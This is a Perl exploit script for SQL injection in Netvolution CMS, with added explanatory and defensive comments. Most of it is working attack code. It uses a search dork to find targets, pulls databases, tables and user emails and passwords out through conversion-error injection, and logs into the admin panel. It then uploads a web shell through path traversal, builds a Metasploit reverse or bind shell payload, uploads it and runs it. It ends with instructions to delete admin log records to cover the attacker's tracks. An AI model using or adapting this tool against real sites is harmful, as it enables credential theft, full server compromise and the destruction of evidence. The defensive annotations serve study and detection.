Netvolution CMS <= 2.x SQL Injection Exploit Script
Posted on 10 June 2010
===================================================
Netvolution CMS <= 2.x SQL Injection Exploit Script
===================================================
#!/usr/bin/perl
#########################################################################################
#                                                                                       #
# Exploit Title: Netvolution exploit script for CMS Version >= 2.xx.xx.xx               #
# Date: 10/6/2010                                                                       #
# Software Link: www.netvolution.net                                                    #
# Exploited by: krumel                                                                  #
# Exploit Coded: mr.pr0n                                                                #
#                                                                                       #
# Many thanks to icesurfer (author of SQLNINJA) and all p0wnbox members.                #
# I have contacted www.atcom.gr; no response yet, although it seems that they have      #
# partially patched the software.                                                       #
#########################################################################################
#                                                                                       #
# This program is free software; you can redistribute it and/or                         #
# modify it under the terms of the GNU General Public License                           #
# as published by the Free Software Foundation; either version 2                        #
# of the License, or (at your option) any later version.                                #
#                                                                                       #
# This program is distributed in the hope that it will be useful,                       #
# but WITHOUT ANY WARRANTY; without even the implied warranty of                        #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the                          #
# GNU General Public License for more details.                                          #
#                                                                                       #
# You should have received a copy of the GNU General Public License                     #
# along with this program; if not, write to the Free Software                           #
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.            #
#                                                                                       #
#########################################################################################
#Using some modules!
# Modules. Only LWP::UserAgent is referenced in this file (it performs
# every HTTP GET against the target); IO::Socket and IO::Handle are
# loaded but never used. No User-Agent is ever set, so LWP's default
# "libwww-perl/<version>" header goes out with each request.
use LWP::UserAgent;
use IO::Socket;
use IO::Handle;

# Banner. The "e[1;31m" ... "e[0m" fragments here and in every other
# coloured string are ANSI colour codes whose leading escape character
# appears to have been lost when this copy was extracted (the same seems
# to have happened to the line endings). Strings are kept exactly as found.
print "e[1;31m _ _ _ _ _ _ _ _ _ e[0m ";
print "e[1;31m | \ | | | | | | | | (_) | | (_) | e[0m ";
print "e[1;31m | \| | ___| |___ _____ | |_ _| |_ _ ___ _ __ _____ ___ __ | | ___ _| |_ e[0m ";
print "e[1;31m | . ` |/ _ \ __\ \ / / _ \| | | | | __| |/ _ \| '_ \ / _ \ \/ / '_ \| |/ _ \| | __| e[0m ";
print "e[1;31m | |\ | __/ |_ \ V / (_) | | |_| | |_| | (_) | | | | | __/> <| |_) | | (_) | | |_ e[0m ";
print "e[1;31m |_| \_|\___|\__| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| \___/_/\_\ .__/|_|\___/|_|\__| e[0m ";
print "e[1;31m | | e[0m ";
print "e[1;31m |_| ...for CMS Version >= 2.xx.xx.xx e[0m ";

# ************* #
# Target dork.  #
# ************* #
# Search-engine query the author uses to locate installations; the
# "default.asp?pid" page is the same one every request below is sent to.
print " Google Dork:";
print " e[1;45mallinurl: 'default.asp?pid'e[0m ";

# ************ #
# Main Menu.   #
# ************ #
# "menu:" is a bare label. Every option handler below except metasploit()
# ends with "goto menu", which jumps out of the sub back to this label,
# so the program keeps returning here until option 7 is chosen.
menu:;
print " [*] Main Menu: ";
print " 1. Automated list site scan for injection. ";
print " 2. Export all Infomation_Schema Tables and Columns. ";
print " 3. Find all Databases. ";
print " 4. Export all usernames and passwords of the 'cms_Users' table. ";
print " 5. Manuall exploitation. ";
print " 6. Compatibility with the Metasploit Framework. ";
print " 7. Exit. ";
print "> ";
$option=<STDIN>;    # trailing newline is kept; the numeric compares below ignore it
print " ";
# Re-prompt on anything outside 1..7. Numeric "!=" treats non-numeric
# input as 0, so that is rejected as well.
if ($option!=1 && $option!=2 && $option!=3 && $option!=4 && $option!=5 && $option!=6 && $option!=7) {
    print "e[1;31mWrong Option!!e[0m ";
    goto menu;
}
# Select Option. Each handler is invoked with the old "&name" form, which
# passes the caller's current @_ (empty at file scope). Options 1-5 never
# return (they "goto menu"); option 6 returns normally, after which
# execution falls past the sub definitions to the CAUTION notice printed
# at the end of the file.
if ($option==1) {&site_scan} # Automated list site scan for injection.
if ($option==2) {&info_schema_tables_and_columns}# Export all Infomation_Schema Tables and Columns.
if ($option==3) {&extract_db}# Find all Databases.
if ($option==4) {&automated_exploitation}# Export all usernames and passwords of the 'cms_Users'table.
if ($option==5) {&manually}# Manuall exploitation.
if ($option==6) {&metasploit}# Compatibility with Metasploit Project (Under construction).
if ($option==7) {&quit}# Quit it!
# ******************************************* #
# Automated list site scan for injection.
# ******************************************* #
# Probes every URL in a local list. A site is reported when the response
# to "<url>10+and+1=convert(int,db_name(1))" contains the "value '...' to"
# fragment of a database conversion error (presumably SQL Server's
# "converting the ... value '…' to data type int" message; the script
# never checks which DBMS it is talking to).
# Defensive note: the probe is a plain GET whose query string contains
# "convert(int,", and success depends entirely on the application echoing
# the raw database error. Both are simple log/WAF signatures, and not
# exposing database errors removes this oracle altogether.
sub site_scan {
    $sites= "/Users/pentest/Desktop/sites.txt";    ######## ***[E_D_I_T H_E_R_E]*** ##############
    $scan = "10+and+1=convert(int,db_name(1))";
    # Counter
    $i = 1;
    print " [*]Opening site list... ";
    # Two-argument open on a bareword handle with no error check: if the
    # file cannot be opened, @sitelist is simply empty and nothing is
    # scanned, although "opened successfully" is still printed.
    open (SITELIST, $sites);
    print " [*]Sitelist opened successfully! ";
    print " [*]Scanning... ";
    @sitelist = <SITELIST>;
    print " [*]Results: ";
    # Iterates indices 1 .. scalar(@sitelist); chop() removes the final
    # character (the newline) of each entry before the probe is appended.
    for ($i; $i <= @sitelist; $i++) {
        $host = $sitelist[$i];
        chop ($host);
        $int = LWP::UserAgent->new() or die;
        $check=$int->get($host.$scan);
        if ($check->content =~ m/value '(.*)' to/g) {
            # As transcribed "$hoste[0m" no longer reads as $host followed
            # by a colour reset, because the escape before "[0m" is gone.
            print "e[1;36m$hoste[0m ";
        }
    }
    goto menu;
}

# ********************************************************** #
# Exploiting *all* the Infomation_Schema Tables and Columns. #
# ********************************************************** #
# Enumerates table names, then column names, from Information_Schema,
# one name per request, through the same conversion-error oracle.
# "se%l%e%c%t" looks like a filter-evasion spelling of SELECT (the
# percent signs are presumably discarded by the target before the query
# runs); the literal request string is what a web-server log would show.
# The target URL is read from STDIN and used unchanged as the prefix of
# every request; the injection text is concatenated directly onto it.
sub info_schema_tables_and_columns {
    # ***************#
    # Table Counter  #
    # ***************#
    print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=) ";
    print "> ";
    $atcom=<STDIN>;
    print "Enter the range scanning of Tables (e.g.: 15): ";
    print "> ";
    $endt =<STDIN>;
    # Counter
    $countt = 1;
    print " [*] Exloiting Information_Schema Tables... 
";
    # First request: "top 1 table_name" with no exclusion list.
    $infoschema_t = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables))";
    $int = LWP::UserAgent->new() or die;
    $check=$int->get($atcom.$infoschema_t);
    if ($check->content =~ m/value '(.*)' to/g) {
        ($first_t) = $1;
        print "e[1;33m$first_te[0m ";
        # The recovered name is re-encoded with a "%" between every
        # character and wrapped in %27 (single quotes) so it can be placed
        # in the NOT IN list of the following requests.
        @chars_t = split(//, "$first_t");
        $got_t = join("%", @chars_t);
        $first_t = "%27$got_t%27";
        # Runs $endt rounds regardless of results; each round excludes
        # every name seen so far. A round with no match prints nothing
        # and leaves the exclusion list unchanged.
        for ($countt; $countt <= $endt; $countt++) {
            $fullsqli_t = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables%20where%20table_name%20not%20in($first_t)))";
            $int = LWP::UserAgent->new() or die;
            $check=$int->get($atcom.$fullsqli_t);
            if ($check->content =~ m/value '(.*)' to/g) {
                ($next_t) = $1;
                print "e[1;33m$next_te[0m ";
                @chars_t = split(//, "$next_t");
                $got_t = join("%", @chars_t);
                $next_t = $got_t ;
                $first_t = $first_t.",%27".$next_t."%27";
            }
        }
    }
    else {
        print "e[1;31mFAILED!e[0m ";
    }
    # ***************#
    # Column Counter #
    # ***************#
    # Same procedure for column_name; note that column names are collected
    # across all tables, not per table.
    print "Enter the range of scanning Columns (e.g.: 20) ";
    print "> ";
    $endc =<STDIN>;
    # Counter
    $countc = 1;
    print "[*] Exloiting Information_Schema Column... 
";
    $infoschema_c = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns))";
    $int = LWP::UserAgent->new() or die;
    $check=$int->get($atcom.$infoschema_c);
    if ($check->content =~ m/value '(.*)' to/g) {
        ($first_c) = $1;
        print "e[1;33m$first_ce[0m ";
        @chars_c = split(//, "$first_c");
        $got_c = join("%", @chars_c);
        $first_c = "%27$got_c%27";
        for ($countc; $countc <= $endc; $countc++) {
            $fullsqli_c = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns%20where%20column_name%20not%20in($first_c)))";
            $int = LWP::UserAgent->new() or die;
            $check=$int->get($atcom.$fullsqli_c);
            if ($check->content =~ m/value '(.*)' to/g) {
                ($next_c) = $1;
                print "e[1;33m$next_ce[0m ";
                @chars_c = split(//, "$next_c");
                $got_c = join("%", @chars_c);
                $next_c = $got_c ;
                $first_c = $first_c.",%27".$next_c."%27";
            }
        }
    }
    else {
        # No trailing space here, unlike the table branch.
        print "e[1;31mFAILED!e[0m";
    }
    goto menu;
}

# *************************************** #
# Exploiting *all* the inside Databases.  #
# *************************************** #
# Lists database names by id: db_name(1), db_name(2), ... up to the
# count typed by the operator, one request each, through the same
# conversion-error oracle. A "FAILED!" line is printed for every id that
# produces no match, so the output is one line per id either way.
sub extract_db {
    print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=) ";
    print "> ";
    $atcom=<STDIN>;
    print "Enter the range of scanning Databases (e.g.: 30) ";
    print "> ";
    $enddb =<STDIN>;
    # Counter
    $countdb = 1;
    print "[*] Exloiting the inside Databases.... 
";
    for ($countdb; $countdb <= $enddb; $countdb++) {
        $db = "10+and+1=convert(int,db_name($countdb))";
        $int = LWP::UserAgent->new() or die;
        $check=$int->get($atcom.$db);
        if ($check->content =~ m/value '(.*)' to/g) {
            ($database) = $1;
            print "[ID:$countdb]","e[1;35m$databasee[0m ";
        }
        else {
            print "e[1;31mFAILED!e[0m ";
        }
    }
    goto menu;
}

# ***************************************************************** #
# Exploiting *all* usernames and passwords of the table "cms_Users" #
# ***************************************************************** #
# For userID 1..$end, sends two requests per id (useremail, then
# userpassword, each via substring(...) inside the conversion-error
# oracle) and prints "[ID:n] email : password". The last pair that came
# back is left in the file-level globals $gotmail/$gotpass, which
# metasploit() reuses. Whatever cms_Users.userpassword actually holds is
# printed verbatim; nothing here tells whether it is hashed.
sub automated_exploitation {
    print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=) ";
    print "> ";
    $atcom=<STDIN>;
    print "Enter the range of scanning userID (e.g.: 20) ";
    print "> ";
    $end =<STDIN>;
    # Counter
    $count = 1;
    print "[*] Exloiting Usernames and Passwords... ";
    for ($count; $count <= $end; $count++) {
        $useremail = "10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29";
        $userpassword = "10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29";
        $int = LWP::UserAgent->new() or die;
        $check=$int->get($atcom.$useremail);
        if ($check->content =~ m/value '(.*)' to/g) {
            ($email) = $1;
            print "[ID:$count]"," e[1;32m$emaile[0m";
            $gotmail = $email; # Usage for the section of Metasploit Framework.
            # Password is only requested when the email lookup succeeded.
            $int = LWP::UserAgent->new() or die;
            $check=$int->get($atcom.$userpassword);
            if ($check->content =~ m/value '(.*)' to/g){
                ($pass) = $1;
                print " : e[1;32m$passe[0m ";
                $gotpass = $pass; # Usage for the section of Metasploit Framework.
            }
            else {
                print " : e[1;31m-e[0m ";
            }
        }
        else {
            print "[ID:$count","] e[1;31m-e[0m : e[1;31m-e[0m ";
        }
    }
    goto menu;
}

# **************************************** #
# Exploiting Columns and Tables manually.
# **************************************** #
# Same single-value retrieval as automated_exploitation(), but the table
# and column names are typed in and interpolated straight into the
# request text; the row is still selected by "userID=<n>" for n in
# 1..$endm, so the chosen table must have such a column for anything to
# come back. Output is "[ID:n] value" or "[ID:n] - : -" per id.
sub manually {
    print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=) ";
    print "> ";
    $atcom=<STDIN>;
    print "Enter the name of your target's Table (e.g.: cms_Users) ";
    print "> ";
    $table =<STDIN>;
    print "Enter your the name of your target's Column (e.g.: userpassword) ";
    print "> ";
    $column =<STDIN>;
    print "Enter the range of scanning (e.g.: 10) ";
    print "> ";
    $endm =<STDIN>;
    $countm = 1;
    print "[*] Manuall Exploitation... ";
    for ($countm; $countm <= $endm; $countm++) {
        $manually = "10+and+1=convert(int,(se%l%e%c%t(substring($column,1,1000))%20from%20$table%20where%20userID=$countm%29%29";
        $int = LWP::UserAgent->new() or die;
        $check=$int->get($atcom.$manually);
        if ($check->content =~ m/value '(.*)' to/g){
            ($got) = $1;
            print "[ID:$countm]"," e[1;32m$gote[0m ";
        }
        else {
            print "[ID:$countm","] e[1;31m-e[0m : e[1;31m-e[0m ";
        }
    }
    goto menu;
}

# ***************************************************************** #
# Compatibility with the Metasploit Framework.
# ***************************************************************** #
# Post-exploitation chain. In order: makes sure a username/password pair
# is known (reusing $gotmail/$gotpass from automated_exploitation(),
# otherwise taking the first userID whose email and password both come
# back); locates msfcli and msfpayload; logs into the CMS admin area with
# curl; uploads a web shell (cmdasp.aspx, expected in the current
# directory); builds a Metasploit executable with msfpayload; uploads it
# the same way; starts a handler in a background xterm; and finally asks
# the web shell to run the uploaded executable. Unlike the other handlers
# this sub returns normally (no "goto menu"), or exit(-1)s on failure.
# Defensive notes - the server-side artefacts this sequence leaves:
#   - a POST with email/password to /admin/default.asp?ac=2 right after a
#     burst of GETs carrying "convert(int," on default.asp;
#   - multipart uploads to /admin/tools/files/filesUpload.asp whose
#     "folder" parameter contains an encoded "../" sequence;
#   - new files apparently landing under /files/: cmdasp.aspx and
#     backup<N>.exe (see the name construction below);
#   - a POST to /files/cmdasp.aspx with "testing=excute".
# Operator-side caveat: $gotmail, $gotpass and $site originate from the
# remote database and the typed URL and are spliced unquoted into shell
# command strings handed to system(), so data the target controls ends
# up on the operator's own command line.
sub metasploit {
    # Credential lookup only when the automated run did not already fill
    # $gotmail/$gotpass (both file-level globals).
    if (($gotmail eq "") or ($gotpass eq "")) {
        print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=) ";
        print "> ";
        $atcom=<STDIN>;
        $end = 10;
        $count = 1;
        # Tries userID 1..9; setting $end = $count on the first complete
        # hit makes the loop condition fail at the next iteration.
        for ($count; $count < $end; $count++) {
            $useremail = "10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29";
            $userpassword = "10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29";
            $int = LWP::UserAgent->new() or die;
            $check=$int->get($atcom.$useremail);
            if ($check->content =~ m/value '(.*)' to/g) {
                ($email) = $1;
                $gotmail = $email;
                $int = LWP::UserAgent->new() or die;
                $check=$int->get($atcom.$userpassword);
                if ($check->content =~ m/value '(.*)' to/g){
                    ($pass) = $1;
                    $gotpass = $pass;
                    $end = $count;
                }
            }
        }
    }
    # Host part for the curl calls. Only "www.<name>.gr" URLs match (the
    # dots are unescaped, the capture is greedy); anything else leaves
    # $site unset and every curl below is sent to "www..gr".
    if ($atcom =~ m/www.(.*).gr/g){
        ($site) = $1;
    }
    # Checking if the Metasploit Framework is already installed.
    print "[*] Looking for the Metasploit Framework... 
";
    $msfcli = "";
    $msfpayload = "";
    # $msfpath is never assigned anywhere in this file, so the PATH walk
    # is the branch that actually runs. Both msfcli/msfpayload and their
    # "3"-suffixed names are accepted; the last directory that has one
    # wins.
    if ($msfpath eq "") {
        $path1 = $ENV{PATH};
        @path = split(/:/,$path1);
        foreach (@path) {
            if (-e $_."/msfcli") {
                $msfcli = $_."/msfcli";
            }
            elsif (-e $_."/msfcli3") {
                $msfcli = $_."/msfcli3";
            }
            if (-e $_."/msfpayload") {
                $msfpayload = $_."/msfpayload";
            }
            elsif (-e $_."/msfpayload3") {
                $msfpayload = $_."/msfpayload3";
            }
        }
    }
    else {
        # Unreachable as the file stands (see above).
        if (-e $msfpath."/msfcli") {
            $msfcli = $msfpath."msfcli";
        }
        elsif (-e $msfpath."/msfcli3") {
            $msfcli = $msfpath."msfcli3";
        }
        if (-e $msfpath."/msfpayload") {
            $msfpayload = $msfpath."msfpayload";
        }
        elsif (-e $msfpath."/msfpayload3") {
            $msfpayload = $msfpath."msfpayload3";
        }
    }
    if ($msfcli eq ""){
        print "[e[1;31m FAILED e[0m] ";
        print "[-] msfcli not found ";
        exit(-1);
    }
    if ($msfpayload eq "") {
        print "[e[1;32m FAILED e[0m] ";
        print "[-] msfpayload not found ";
        exit(-1);
    }
    print "[e[1;32m DONE e[0m] ";
    #Retrieve Cookie
    # Session state is kept in curl's cookie jar (cookies.txt in the
    # current directory). "-k" disables certificate verification, "-L"
    # follows redirects. Step 1 fetches the front page to obtain a
    # session cookie, step 2 posts the recovered credentials to the admin
    # login. Neither exit status is checked; the chain continues blindly.
    system('curl -k -L -b cookies.txt -c cookies.txt -o step-1.html http://www.'.$site.'.gr/');
    system('curl -k -L -b cookies.txt -c cookies.txt -d email='.$gotmail.' -d password='.$gotpass.' -o step-2.html http://www.'.$site.'.gr/admin/default.asp?ac=2');
    #Upload Web-Backdoor
    # Multipart upload of a local cmdasp.aspx through the admin file
    # tool; the "folder" value is an encoded "../../../files", i.e. the
    # upload location is chosen by path traversal rather than the tool's
    # intended directory.
    system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@cmdasp.aspx http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles');
    # Choose your payload.
    print "Which payload you want to use? ";
    print " 1. Meterpreter 2. VNC ";
    # $payload is undefined on entry; keeps prompting until 1 or 2 is typed.
    while (($payload ne 1) and ($payload ne 2)) {
        print "msf > ";
        $payload = <STDIN>;
        chomp($payload);
    }
    if ($payload == 1) {
        $payload = "meterpreter";
    }
    else {
        $payload = "vncinject";
    }
    # Choose your connection.
    print "Which type of connection you want to use? ";
    print " 1. bind_tcp 2. 
reverse_tcp ";
    while (($conn ne "1") and ($conn ne "2")) {
        print "msf > ";
        $conn = <STDIN>;
        chomp($conn);
    }
    if ($conn == 1) {
        $conn = "bind_tcp";
    }
    else {
        $conn = "reverse_tcp";
    }
    # bind_tcp needs the target host for the handler ($rhost); reverse_tcp
    # needs the address baked into the payload ($lhost) and the address
    # the local handler listens on ($lhost1).
    if ($conn eq "bind_tcp"){
        print "Enter your Remote host ";
        print "msf > ";
        $rhost = <STDIN>;
        chomp $rhost
    }
    else {
        print "Enter your Public IP ";
        print "msf > ";
        $lhost = <STDIN>;
        chomp $lhost ;
        print "Enter your Local Host ";
        print "msf > ";
        $lhost1 = <STDIN>;
        chomp $lhost1 ;
    }
    if ($conn eq "bind_tcp"){
        print "Enter Remote port number ";
    }
    else {
        print "Enter local port number ";
    }
    # Port must be within 1..65535; non-numeric input evaluates to 0 and
    # re-prompts.
    $port = 0;
    while (($port < 1) or ($port > 65535)){
        print "msf > ";
        $port = <STDIN>;
        chomp($port);
    }
    # Choose your Encryption.
    # (This is an msfpayload encoder choice, not encryption; 0 means none.)
    $enc = -1;
    print "[*] Choose a payload encoding method: ".
        " 0. None ".
        " 1. Alpha2 Alphanumeric Mixedcase ".
        " 2. Alpha2 Alphanumeric Uppercase ".
        " 3. Avoid UTF8/tolower ".
        " 4. Call+4 Dword XOR ".
        " 5. Single-byte XOR Countdown ".
        " 6. Variable-length Fnstenv/mov Dword XOR ".
        " 7. Polymorphic Jump/Call XOR Additive Feedback ".
        " 8. Non-Alpha ".
        " 9. Non-Upper ".
        " 10. Polymorphic XOR Additive Feedback ".
        " 11. Alpha2 Alphanumeric Unicode Mixedcase ".
        " 12. Alpha2 Alphanumeric Unicode Uppercase ";
    while (($enc < 0) or ($enc > 12)) {
        print "msf > ";
        $enc = <STDIN>;
        chomp($enc);
    }
    # "for ($enc)" aliases $_ to $enc so the bare regexes act as a switch;
    # the matching arm appends the encoder name (0 clears the option).
    $encoder = " encoder=";
    for ($enc) {
        /^0$/ && do {$encoder = ""};
        /^1$/ && do {$encoder .= "x86/alpha_mixed "};
        /^2$/ && do {$encoder .= "x86/alpha_upper "};
        /^3$/ && do {$encoder .= "x86/avoid_utf8_tolower "};
        /^4$/ && do {$encoder .= "x86/call4_dword_xor "};
        /^5$/ && do {$encoder .= "x86/countdown "};
        /^6$/ && do {$encoder .= "x86/fnstenv_mov "};
        /^7$/ && do {$encoder .= "x86/jmp_call_additive "};
        /^8$/ && do {$encoder .= "x86/nonalpha "};
        /^9$/ && do {$encoder .= "x86/nonupper "};
        /^10$/ && do {$encoder .= "x86/shikata_ga_nai "};
        /^11$/ && do {$encoder .= "x86/unicode_mixed "};
        /^12$/ && do {$encoder .= "x86/unicode_upper "};
    }
    # Creation of the executable payload.
    # "010101" is an octal literal (4161), so the name is backup<0..4160>
    # with ".exe" appended; the file is written to /tmp and later uploaded
    # under the same name, which makes "backup<digits>.exe" a usable
    # indicator on the target.
    $exe = "backup".int(rand()*010101);
    $command = $msfpayload." windows/".$payload."/".$conn.$encoder." exitfunc=process";
    if ($conn eq "bind_tcp") {
        $command .= " lport=".$port." X > /tmp/".$exe.".exe";
    }
    else {
        $command .= " lport=".$port." lhost=".$lhost." X "."> /tmp/".$exe.".exe";
    }
    # $verbose is never set in this file, so the command is not echoed.
    if ($verbose == 1) {
        print "[v] Command: ".$command." ";
    }
    system ($command);
    # Success is judged only by the output file existing, not by the
    # msfpayload exit status.
    unless (-e "/tmp/".$exe.".exe") {
        print "[-] Payload creation... [e[1;31m FAILED e[0m] ";
        exit(-1);
    }
    print "[*] Payload creation... [e[1;32m DONE e[0m] ";
    print "[*] Payload (".$exe.".exe) created. ";
    $xpl = '/tmp/'.$exe.'.exe';
    #Upload the executable file to the remote Webserver.
    # Same traversal upload as for the web shell, with the generated exe.
    system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@'.$xpl.' http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles');
    $parameter = $exe.".exe";
    # The child handles the request to the target, the parent calls Metasploit Framework!
    # (As written the child only sleeps one second and exits; the parent
    # does everything below. fork()'s return value is compared as a string.)
    $pid = fork();
    if ($pid eq 0) {
        sleep(1);
        exit(0);
    }
    # This is the parent.
    # Handler command: multi/handler with the payload/transport chosen
    # above; RHOST for bind, LHOST for reverse. "E" executes it.
    $syscommand = $msfcli." exploit/multi/handler "."PAYLOAD=windows/".$payload."/".$conn." ";
    if ($conn eq "bind_tcp") {
        $syscommand .= "LPORT=".$port." RHOST=".$rhost." E";
        print "e[1;34m$syscommande[0m ";
    }
    else {
        $syscommand .= "LPORT=".$port." LHOST=".$lhost1." E";
        print "e[1;34m$syscommande[0m ";
    }
    #Execute msfcli
    print "Are you ready to execute msfcli? (Press Enter) ";
    print "msf > ";
    $enter = <STDIN>;
    chomp($enter);
    print " Please Wait...";
    # "DONE" is printed before the handler is even started; the xterm is
    # backgrounded with "&" and the script simply waits 30 s for it.
    print "[*] Executing the msfcli... [e[1;32m DONE e[0m] ";
    system("xterm -bg black -fg white -bd black -e ".$syscommand." &"); # If you don't have xterm, install IT!
    sleep(30); # Sleep 30 seconds to fire up Metasploit Framework!
    #Execute metasploit shell throught Web-Backdoor (cmdasp.aspx).
    # Posts to the uploaded web shell. The __VIEWSTATE/__EVENTVALIDATION
    # values and the txtArg path are hard-coded for one particular
    # deployment (the path names a specific site, and its backslashes
    # appear to have been lost in this copy, which also breaks the quoting
    # of this statement as shown), so this final step is not generic.
    # The cookie jar here is /tmp/cookies.txt, unlike the earlier calls.
    system('curl -k -L -b /tmp/cookies.txt -c /tmp/cookies.txt -d __VIEWSTATE=%2FwEPDwULLTE2MjA0MDg4ODhkZKAYI%2BuShUtjaEQHez7lnHYtwecj -d txtArg="C:InetpubEventSitesenterpriseitsecurity.grfiles\'.$parameter.'" -d testing=excute -d __EVENTVALIDATION=%2FwEWAwLw6bCOCgKa%2B%2BKPCgKBwth5tWrCE%2BPx6jReXWdJAVRgAZWRoxo%3D http://www.'.$site.'.gr/files/cmdasp.aspx');
}

# Reached after metasploit() returns (it is the only handler that does
# not "goto menu"). The notice describes removing rows from the CMS
# admin-log table keyed by the operator's public address; for a defender
# this says that cms_AdminLog is where the admin login, uploads and web
# shell requests above are recorded, and that the table itself is an
# expected tampering target - an off-host copy of it (and of the web
# server logs) is what preserves the evidence.
print "# ******************************************************************************# ";
print "# CAUTION CAUTION CAUTION CAUTION CAUTION *# ";
print "# ******************************************************************************# ";
print "# In Order to delete the logs go to http://www.target.gr/files/cmdasp.aspx *# ";
print "# and execute the following command : *# ";
print "# *# ";
print "# sqlcmd -S target_IP -U Database_User -P Database_Password -d Target_Database *# ";
print "# -Q ''delete from cms_AdminLog where logRecDbTable='Your_Public_IP' '' -u *# ";
print "# *# ";
print "# The Username and password for the Database can be found inside global.asa *# ";
print "# ******************************************************************************# ";

# ***********#
# Quitting :D #
# ***********#
# Menu option 7. Exits with status 1 even though this is the normal way out.
sub quit {
    print "e[1;31mExiting...Bye-Bye!e[0m ";
    exit(1);
}
# ***************************************************************** #